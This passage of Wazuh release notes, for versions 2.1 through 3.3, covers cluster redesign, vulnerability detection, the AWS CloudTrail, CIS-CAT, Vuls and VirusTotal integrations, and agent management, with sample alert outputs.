This version fixes several performance issues (like CPU usage) and synchronization errors. The communications and synchronization algorithm have been redesigned in order to improve the cluster performance and reliability.

Now, the client nodes initialize the communication and only the master node is included in the client configuration.

The number of daemons has been reduced to one: wazuh-clusterd.

You can check our documentation for Wazuh cluster in the following Cluster basics.

Core improvements

These are the most relevant changes in the Wazuh core:

  • Vulnerability-detector continues to expand its scope, now adding support for Amazon Linux. A bug when comparing epoch versions has also been fixed.

  • The agent limit has been increased to 14000 by default, improving the manager availability in large environments.

  • More internal bugs reported by the community have been fixed for this version.

Wazuh app for Splunk

New section describing the installation process for the Wazuh app for Splunk.

Wazuh app for Kibana

The Dev tools tab has been added in this version. You can use it to interact with the managers by API requests.

Similar to PCI DSS, a new tab for GDPR is included in order to visualize the related alerts.

Other relevant changes in the Wazuh app are:

  • New button for downloading lists on a CSV format. Currently available for the Ruleset, Logs and Groups sections on the Manager tab and also the Agents tab.

  • New option on the configuration file for enabling or disabling the wazuh-monitoring indices creation/visualization.

  • Design improvements for the Ruleset tab.

  • Performance improvements on visualization filters.

  • And many bugfixes for the overall app.

3.2.2 Release notes - 7 May 2018

From the Wazuh team, we continue working hard improving the existing features as well as fixing bugs. This section shows the most relevant improvements and fixes in version 3.2.2. Find more details in each component changelog.

Manager-agent communication

It has been created an input buffer in the manager side, this queue will act as a congestion control by processing all the events incoming from agents.

Between other features of this queue, it dispatches events as fast as possible avoiding any delay in the communication process, and it warns when gets full stopping to ingest more events.

In addition, the capacity of the buffer is configurable in the remote section of the Local configuration.

Wazuh modules

Vulnerability-detector module has an improvement within the version comparator algorithm to avoid false positive alerts. It also has been fixed the behavior when the software inventory of an agent is missing.

Wazuh app: Kibana

The Wazuh app received lots of new improvements for this release. In addition to several bugfixes and performance improvements, these are the major highlights for this Wazuh app version:

  • New dynamic visualization loading system. Now the app loads visualizations on demand, and never store them on the .kibana index.

  • A new design for the Ruleset tab, providing the information about the rules and decoders in a cleaner, more organized way.

  • A new system for role detection over index patterns when using the X-Pack plugin for the Elastic Stack.

  • Refinements and adjustments to the user interface.

Other relevant changes

In addition to the previous points, another more changes included are:

  • The Slack integration has been updated since some used parameters were deprecated by Slack. This integration allows Wazuh to send notifications to Slack when desired alerts are triggered.

  • It has been fixed the agent group file deletion when using the Auth daemon. As well as the client of the daemon for old versions of Windows.

  • Fixed the filter of the output syslog daemon when filtering by rule group.

3.2.1 Release notes - 2 March 2018

This release is a bug fix release. This section shows the most relevant improvements and fixes of Wazuh v3.2.1. You will find more detailed information in the changelog file.

Wazuh modules

The Wazuh modules include several fixes in this release to improve their performance and reliability. The most relevant changes are described in this section.

To avoid the agent flooding, a maximum of events sent per second has been established for every module. This limit is configurable by the wazuh_modules.max_eps parameter of the internal configuration.

For the vulnerability-detector module the following bugs have been fixed: a problem when detecting agents with supported operating systems, and another ones related to duplicated alerts and RAM consumption. Furthermore, this module is no longer included in the agents, reducing package size and preventing errors.

In addition, a bug that made it impossible to set the centralized configuration of the agents software collector has been solved.

For the CIS-CAT wodle it has been improved the JAVA binary selection, updated its rules, and added support for relative/full/network paths in its configuration.

Finally, some memory leaks and other bugs reported by Coverity have been solved.

Cluster

Several bugs have been fixed in the Wazuh cluster, among them, dealing with too long file paths.

The cluster-control tool was improved to retrieve more information about type of nodes, as well as adding the possibility to enable a debug mode for it.

Agents management

Related to the agents management, the Operating System name detection in macOS and old Linux distributions has been fixed, retrieving the needed information correctly.

In addition, agent labels are also inserted in JSON archives even when the event does not match any rule.

The API call GET/agents/purgeable/: timeframe has been restructured to add a new field called totalItems. This field contains the number of agents that can be removed.

OpenSSL library

OpenSSL library has been updated from 1.0.2k to 1.1.0g . This version fixes two security vulnerabilities:

  • CVE-2017-3736 : It can allow an attacker to recover the encryption keys used to protect communications.

  • CVE-2017-3735 : It can allow a malicious user to do a one-byte overread.

3.2.0 Release notes - 8 February 2018

This section shows the most relevant new features of Wazuh v3.2.0. You will find more detailed information in our changelog file.

New features:

Vulnerability detection

A native vulnerability detector has been implemented, making use of agents new feature to report inventory data (e.g. applications installed, network configuration, hardware information). The manager is now capable of building a vulnerability database, making use of public OVAL repositories (published and maintained by different vendors). This database is used to do correlation with agents reported applications inventory data, identifying packages with a CVE.

In version 3.1.0, detecting vulnerabilities was already possible using Wazuh agents integration with Vuls (a third party open source project), but this integration required the installation of additional software on the monitored hosts (adding extra complexity, and making it difficult to manage in a centralized way). Now, in this version, Vuls is not required anymore as this capability is now natively supported using the new agent and manager features.

The new architecture design keeps agents footprint small, not impacting monitored hosts performance or consuming unnecessary resources. Agents just read and report applications installed (RPM, Deb or MSI packages), while the manager is the one that uses the vulnerability database to identify CVEs.

See below an example of results when an application vulnerability is identified:

** Alert 1518102634.685428: - vulnerability-detector,
2018 Feb 08 16:10:34 (PC) ->vulnerability-detector
Rule: 23504 (level 7) -> 'CVE-2017-7226 on Ubuntu 16.04 LTS (xenial) - medium.'
vulnerability.cve: CVE-2017-7226
vulnerability.title: CVE-2017-7226 on Ubuntu 16.04 LTS (xenial) - medium.
vulnerability.severity: Medium
vulnerability.published: 2017-03-22
vulnerability.updated: 2017-03-22
vulnerability.reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7226
vulnerability.rationale: The pe_ILF_object_p function in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.28, is vulnerable to a heap-based buffer over-read of size 4049 because it uses the strlen function instead of strnlen, leading to program crashes in several utilities such as addr2line, size, and strings. It could lead to information disclosure as well.
vulnerability.state: Unfixed
vulnerability.affected_package: binutils
vulnerability.version: 2.26.1-1ubuntu1~16.04.6

You can read more about this new module in the Vulnerability detection section.

Module for AWS Cloudtrail integration

This module provides the ability to read your AWS CloudTrail logs directly from an AWS S3 bucket. Amazon CloudTrail support is now a built-in Wazuh feature, giving you the ability to search, analyze, and generate alerts for AWS CloudTrail events.

Below is an example of the JSON alert generated by this module:

** Alert 1518488581.32874246: - amazon,authentication_success,pci_dss_10.2.5,
2018 Feb 13 02:23:01 manager->Wazuh-AWS
Rule: 80253 (level 3) -> 'Amazon: signin.amazonaws.com - ConsoleLogin - User Login Success.'
aws.eventVersion: 1.05
aws.eventID: 2fb29f0f-4d7f-4384-8170-xxxx
aws.eventTime: 2018-02-13T02:12:26Z
aws.log_file: 1661xxx_CloudTrail_us-east-1_20180xxx_S4Wouyxxx.json.gz
aws.additionalEventData.MFAUsed: No
aws.additionalEventData.LoginTo: https://console.aws.amazon.com/console/home?state=hashArgs%23&isauthcode=true
aws.additionalEventData.MobileVersion: No
aws.eventType: AwsConsoleSignIn
aws.responseElements.ConsoleLogin: Success
aws.awsRegion: us-east-1
aws.eventName: ConsoleLogin
aws.userIdentity.userName: wazuh
aws.userIdentity.type: IAMUser
aws.userIdentity.arn: arn:aws:iam::166157441623:user/wazuh
aws.userIdentity.principalId: AIDAJxxx
aws.userIdentity.accountId: 1661xx4xxx
aws.eventSource: signin.amazonaws.com
aws.userAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
aws.sourceIPAddress: 67.161.xx.xx
aws.recipientAccountId: 166157441623
integration: aws

You can read more about this new module in the AWS CloudTrail section.

CIS-CAT integration now supports Windows OS

In our previous release, the module for integration with CIS-CAT scanner only supported Linux systems. Now, it also supports Windows systems.

CIS-CAT alerts have been also enriched and reports are parsed natively now, improving its efficiency considerably. See below an example of an alert:

** Alert 1518508994.718592: - ciscat,
2018 Feb 13 00:03:14 (Windows7) 192.168.1.201->wodle_cis-cat
Rule: 87409 (level 7) -> ’CIS-CAT: (L2) Ensure ‘Prevent Codec Download’ is set to ‘Enabled’ (failed)'
type: scan_result
scan_id: 589117374
cis.rule_id: 19.7.43.2.1
cis.rule_title: (L2) Ensure ‘Prevent Codec Download’ is set to ‘Enabled’
cis.group: Administrative Templates (User)
cis.description: This setting controls whether Windows Media Player is allowed to download additional codecs for decoding media files it does not already understand. The recommended state for this setting is: Enabled.
cis.rationale: This has some potential for risk if a malicious data file is opened in Media Player that requires an additional codec to be installed. If a special codec is required for a necessary job function, then that codec should be tested and supplied by the IT department in the organization.
cis.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: User Configuration\Policies\Administrative Templates\Windows Components\Windows Media Player\Playback\Prevent Codec Download  Impact: The Player is prevented from automatically downloading codecs to your computer. In addition, the Download codecs automatically check box on the Player tab in the Player is not available.
cis.result: fail
Cluster: Ruleset synchronization and performance improvements

Several bugs have been fixed in the cluster. Also, its general performance has been improved.

The cluster is now able to synchronize decoders, rules and CDB lists. It also makes use of ossec-logtest tool to test that new rules, decoders or CDB lists are correctly formatted, before sending those to the rest of the cluster nodes.

The full list of files synchronized across cluster nodes is:

  • /etc/client.keys

  • /etc/shared

  • /etc/decoders*

  • /etc/rules*

  • /etc/lists*

  • /queue/agent-groups

  • /queue/agent-info

(*) Nodes are restarted when these files are updated.

3.1.0 Release notes - 22 December 2017

This section shows the most relevant new features of Wazuh v3.1.0. You will find more detailed information in our changelog file.

New features:

VULS integration

Vuls (VULnerability Scanner) is a tool that was created for analyzing the vulnerability of Linux systems. This tool looks for known vulnerabilities referenced in databases such as the National Vulnerability Database (NVD).

This integration is achieved through the use of the new Command wodle. This module allows you to run a command at a specified interval or to ignore the output of the command. The Vuls script is designed run Vuls on the agent and send results directly back to the manager and triggering alerts when a vulnerability is identified.

Below is an example of results where a vulnerability is identified:

** Alert 1513880084.806869: - vuls,
2017 Dec 21 18:14:44 ip-172-31-42-67->Wazuh-VULS
Rule: 22405 (level 10) -> 'High vulnerability CVE-2017-16649 detected in scanning launched on 2017-12-21 18:14:36 with 100% reliability (OvalMatch). Score: 7.200000 (National Vulnerability Database). Affected packages: linux-aws (Not fixable)'
{"KernelVersion": "4.4.0-1044-aws", "Source": "National Vulnerability Database", "LastModified": "2017-11-28 14:05:55", "AffectedPackagesInfo": {"linux-aws": {"Repository": "", "NewVersion": "", "Version": "4.4.0-1044.53", "NewRelease": "", "Release": "", "Fixable": "No", "Arch": ""}}, "integration": "vuls", "ScannedCVE": "CVE-2017-16649", "AffectedPackages": "linux-aws (Not fixable)", "DetectionMethod": "OvalMatch", "Score": 7.2, "Link": "https://nvd.nist.gov/vuln/detail/CVE-2017-16649", "OSversion": "ubuntu 16.04", "Assurance": "100%", "ScanDate": "2017-12-21 18:14:36"}
KernelVersion: 4.4.0-1044-aws
Source: National Vulnerability Database
LastModified: 2017-11-28 14:05:55
AffectedPackagesInfo.linux-aws.Repository: Update
AffectedPackagesInfo.linux-aws.NewVersion:
AffectedPackagesInfo.linux-aws.Version: 4.4.0-1044.53
AffectedPackagesInfo.linux-aws.NewRelease:
AffectedPackagesInfo.linux-aws.Release:
AffectedPackagesInfo.linux-aws.Fixable: No
AffectedPackagesInfo.linux-aws.Arch:
integration: vuls
ScannedCVE: CVE-2017-16649
AffectedPackages: linux-aws (Not fixable)
DetectionMethod: OvalMatch
Score: 7.200000
Link: https://nvd.nist.gov/vuln/detail/CVE-2017-16649
OSversion: ubuntu 16.04
Assurance: 100%
ScanDate: 2017-12-21 18:14:36
CIS-CAT Wazuh module to scan CIS policies

The new CIS-CAT module was developed for evaluating CIS benchmarks in Wazuh agents. This module assesses an agent's compliance with CIS policies to ensure the application of the best practices in in the security of your IT systems.

With the CIS-CAT wodle assessments can be scheduled to run periodically, sending reports to the manager and displaying results for each check. A report overview is also displayed as in the example below:

** Alert 1513886205.7639319: - ciscat,
2017 Dec 21 11:56:45 ubuntu->wodle_cis-cat
Rule: 87411 (level 5) -> 'CIS-CAT Report overview: Score less than 80 % (53 %)'
{"type":"scan_info","scan_id":1222716123,"cis-data":{"benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","hostname":"ubuntu","timestamp":"2017-12-21T11:55:50.143-08:00","score":53}}
type: scan_info
scan_id: 1222716123
cis-data.benchmark: CIS Ubuntu Linux 16.04 LTS Benchmark
cis-data.hostname: ubuntu
cis-data.timestamp: 2017-12-21T11:55:50.143-08:00
cis-data.score: 53

Currently, this module is focused only on Linux systems, however, this will also be available for Windows systems in future versions.

You will find further information about this new module in the CIS-CAT integration section.

New "Command" Wazuh module

The new Command wodle has been included in this version to allow commands to be run asynchronously. This module allows commands to be run at specified intervals and includes an option to ignore the output.

The complete configuration guide for this command can be found at Command wodle configuration.

New rotation capabilities for alerts

In large environments, the alerts file may take up a large amount of disk space. To address this, Wazuh 3.1 includes support for rotating the following files by time or size:

  • alerts (plain-text and JSON),

  • archives (plain-text and JSON), and

  • firewall events (plain-text).

Until this release, alert files were rotated once a day. With this release, you now have the ability to set a more frequent rotation interval (maximum one day) and specify a maximum file size that will trigger the rotation procedure. Rotated files are compresses and signed and stored in the same way they were previously.

In the <global> section of the Local configuration you will find information on how to configure this feature.

Wazuh API

The Wazuh API has been enhanced with new requests, such as:

  • a request for getting agent information by agent name,

  • a request for purging never connected or disconnected agents after a defined time-frame, and

  • a request for getting purgeable agents.

In addition, more new features can be found in the API changelog.

Ruleset

The Ruleset has been improved to include the necessary rules for the CIS-CAT and VULS integrations.

More information on changes to the Ruleset can be found on the Ruleset changelog.

More relevant features

Additional features have been added to Wazuh 3.1.0 in order to improve its performance, including, but not limited to:

  • a new field in JSON alerts including timestamp from predecoded logs,

  • the ability to refuse shared configuration in agents locally using the agent.remote_conf option as explained in the Internal configuration section,

  • When ossec is used to disable a component, the relevant daemon is now immediately stopped,

  • The Syscheck reporting_changes feature formerly suppressed inclusion of file change details in alerts if the changes were detected during the first Syscheck scan after an agent restarted. Now, file changes will be included every time textual file change data is available, and

  • fixes to reported bugs.

3.0.0 Release notes - 3 December 2017

This section shows the most relevant new features of Wazuh v3.0.0. You will find more detailed information in our changelog file.

For deploying your Wazuh environment see the Installation guide.

New features:

Grouping agents

Support for the grouping of agents has now been included at the Wazuh manager level, which makes centralized configuration more flexible and efficient.

Version 3.0.0 allows agents to be assigned to a specific group which may have different agent configuration, rootcheck policies and hardening checks than other groups. The manager will then send only the necessary files to each agent based on this assignment. Once the new configuration is received, the agent will restart itself to apply the changes.

This groups management feature is available via terminal using a CLI included in the Wazuh manager, as well using Wazuh API requests.

More information about this feature is found at Grouping agents.

Remote agent upgrades

The manager can now upgrade agents remotely. The agent version and OS it is running on are registered with the manager. The manager uses this information to know which agents need to be upgraded and which upgrade package to send.

A custom procedure has been created to perform these upgrades without relying on external package managers (apt/yum). The manager will instead send a compressed and signed WPK (Wazuh Signed Package) that contains the necessary binaries and instructions to upgrade the agent.

The ability to roll back the upgrade is built into the process. If the agent loses connection with the manager after the upgrade, the agent will automatically be rolled back to recover the agent connectivity.

WPK files will be generated by Wazuh for every new release. You may also use your own custom WPK files.

In our dedicated section for Remote upgrading, you can find more information about this procedure.

Wazuh cluster for managers

The Wazuh cluster provides new capability to scale Wazuh horizontally by adding as many manager nodes as needed to process events from the reporting agents.

The cluster architecture is master/client based, synchronizing internal configuration files (agent keys, groups configuration, agents configuration and agent statuses) between all clients nodes. This allows agents to report to multiple managers (cluster nodes) which increases availability and fault tolerance.

More information on this new functionality can be found in the dedicated section at Cluster basics.

Automatic decoding for JSON events

The Wazuh manager now includes a native decoder for the JSON format which can read any JSON event and extract its fields dynamically. This new decoder enables Wazuh to use all JSON fields/values for creating rules.

See the JSON decoder section for further information.

Along with this, we introduced a new log format in Logcollector to be able to monitor JSON log files. Custom labels can be included from the endpoint which will add valuable metadata to the monitored JSON logs.

See below for sample configuration:

<localfile>
  <location>/var/log/myapp/log.json</location>
  <log_format>json</log_format>
  <label key="@source">myapp</label>
  <label key="agent.type">webserver</label>
</localfile>

Below is a sample JSON log from the monitored file.

{
  "event": {
    "type": "write",
    "destination": "sample.txt"
  },
  "agent": {
    "name": "web01"
  }
}

The following will be the result when the above configuration is applied to the JSON log:

{
  "event": {
    "type": "write",
    "destination": "sample.txt"
  },
  "agent": {
    "name": "web01",
    "type": "webserver"
  },
  "@source": "myapp"
}

Information on how to configure this feature can be found in the localfile section of ossec.conf.

VirusTotal Integration

This new version includes an integration with the VirusTotal platform.

This allows the Manager to send the hashes of collected files (via Syscheck) to the VirusTotal API, reporting back the scan results and generating an alert when there is a positive result.

The integration with VirusTotal as a threat intelligence source, along with the existing FIM capabilities is a significant improvement in Wazuh's malware detection.

Below is an example of an alert triggered from a positive result:

** Alert 1510684984.55826: mail  - virustotal,
2017 Nov 14 18:43:04 PC->virustotal
Rule: 87105 (level 12) -> 'VirusTotal: Alert - /media/user/software/suspicious-file.exe - 7 engines detected this file'
{"virustotal": {"permalink": "https://www.virustotal.com/file/8604adffc091a760deb4f4d599ab07540c300a0ccb5581de437162e940663a1e/analysis/1510680277/", "sha1": "68b92d885317929e5b283395400ec3322bc9db5e", "malicious": 1, "source": {"alert_id": "1510684983.55139", "sha1": "68b92d885317929e5b283395400ec3322bc9db5e", "file": "/media/user/software/suspicious-file.exe", "agent": {"id": "006", "name": "agent_centos"}, "md5": "9519135089d69ad7ae6b00a78480bb2b"}, "positives": 7, "found": 1, "total": 67, "scan_date": "2017-11-14 17:24:37"}, "integration": "virustotal"}
virustotal.permalink: https://www.virustotal.com/file/8604adffc091a760deb4f4d599ab07540c300a0ccb5581de437162e940663a1e/analysis/1510680277/
virustotal.sha1: 68b92d885317929e5b283395400ec3322bc9db5e
virustotal.malicious: 1
virustotal.source.alert_id: 1510684983.55139
virustotal.source.sha1: 68b92d885317929e5b283395400ec3322bc9db5e
virustotal.source.file: /media/user/software/suspicious-file.exe
virustotal.source.agent.id: 006
virustotal.source.agent.name: agent_centos
virustotal.source.md5: 9519135089d69ad7ae6b00a78480bb2b
virustotal.positives: 7
virustotal.found: 1
virustotal.total: 67
virustotal.scan_date: 2017-11-14 17:24:37
integration: virustotal

The complete documentation of this integration is located at VirusTotal integration section.

MSI Windows installer for agents

A new digitally signed MSI Windows installer has been developed in order to improve the installation process for Windows agents.

This installer can be launched in unattended mode from the command line and combines the agent installation, configuration, registration and connection into a single step.

The procedure for using the MSI installer can be found at: Install Wazuh agent on Windows

Wazuh API

The Wazuh API now includes functionality to manage all the features included in this release, such as:

  • the management of remote agent upgrades,

  • the requests for managing groups, and

  • the management of the new Wazuh Cluster.

In addition, more new features can be found in the API changelog.

Ruleset

The Ruleset has also been improved and now includes the necessary rules for the VirusTotal integration.

For details on changes in the Ruleset, please visit the Ruleset changelog.

Updated external libraries

External libraries used by Wazuh have been updated to improve their integration with our components.

More relevant features

Additional features have been added to Wazuh 3.0.0 in order to improve its performance, including, but not limited to:

  • the ability to choose the Cipher suite in Authd settings,

  • the Automatic restarting of an agent when a new shared configuration is added from the manager,

  • the 'pending' state that is now shown for agents that are waiting for a manager response,

  • the ability to configure several managers for each agent, specifying its own protocol and port for each, and

  • the new functionality to rotate and compress internal logs by size.

2.x

This section summarizes the most important features of each Wazuh 2.x release.

Wazuh version

Release date

2.1.0

17 August 2017

2.1 Release notes - 17 August 2017

This section shows the most relevant new features of Wazuh v2.1. You will find more detailed information in our changelog file.

New features:

Anti-flooding mechanism

The Anti-flooding mechanism is designed to prevent large bursts of events on an agent from negatively impacting the network or the manager. It uses a leaky bucket queue that collects all generated events and sends them to the manager at a rate below a specified events per second threshold.

Learn more about this new mechanism at Anti-flooding mechanism.

Labels for agent alerts

This feature allows agent-specific attributes to be included in each alert. These labels provide a simple way of adding valuable metadata to alert records and can include data points like who is in charge of a particular agent or the agent's installation date and .

For more details about this new feature see our Labels section.

Improved Authd performance

The Authd program has been improved in this version such that the Wazuh API and the manage_agents tools can now register an agent while ossec-authd is running.

Additionally, ossec-authd now runs in the background and can be enabled using the command ossec-control enable auth. See the auth section of ossec.conf for configuration options and sample configuration.

Finally, the new force_insert and force_time options in Authd (-F<time> from the ossec-authd command line) allow for the automatic deletion of agents that match the name or IP address of a new agent you are attempting to register.

New features for internal logs

As JSON is one of the most popular logging formats, we have made it possible in this new version to have internal logs written in JSON format, plain text or both. This can be configured in the logging section of ossec.conf.

In addition, we have simplified the management of internal logs such that they are rotated and compressed daily. We have further made it possible to control the use of disk space by configuring a the length of time for between the rotated logs before they are automatically deleted.

These parameters are configured in the monitord section of Internal configuration.

Updated external libraries

External libraries used by Wazuh have been updated to improve their integration with our components.

Wazuh API

The request /agents now returns information about the OS and a specified list of agents can now be restarted or deleted.

Ruleset

The previous Windows decoders extracted a wrong user (the subject user) but this has been corrected in this version and new fields have also been added.